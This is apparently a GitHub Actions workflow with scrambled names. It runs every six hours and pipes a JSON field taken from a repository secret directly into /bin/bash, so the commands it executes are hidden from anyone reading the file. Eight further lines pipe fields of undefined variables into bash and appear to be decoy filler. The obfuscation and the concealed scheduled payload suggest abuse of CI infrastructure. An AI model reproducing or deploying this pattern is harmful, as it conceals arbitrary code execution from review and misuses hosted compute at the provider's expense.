name: guoshilun1248
on:
  workflow_dispatch:
  schedule:
    - cron: '47 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: guoshilun1248
        env:
          yl8233: ${{ secrets.yl8233 }}
        run: |
          echo $yl8233 | jq -r .y2369 | /bin/bash
          echo $rqmo9 | jq -r .izry35 | /bin/bash
          echo $bq259 | jq -r .jfojo751 | /bin/bash
          echo $mskz50 | jq -r .bierc9 | /bin/bash
          echo $udj15 | jq -r .yry0151 | /bin/bash
          echo $larb9066 | jq -r .t97249 | /bin/bash
          echo $qsc03646 | jq -r .tgmen386 | /bin/bash
          echo $tp134 | jq -r .k28268 | /bin/bash
          echo $i96688 | jq -r .pljh59 | /bin/bash

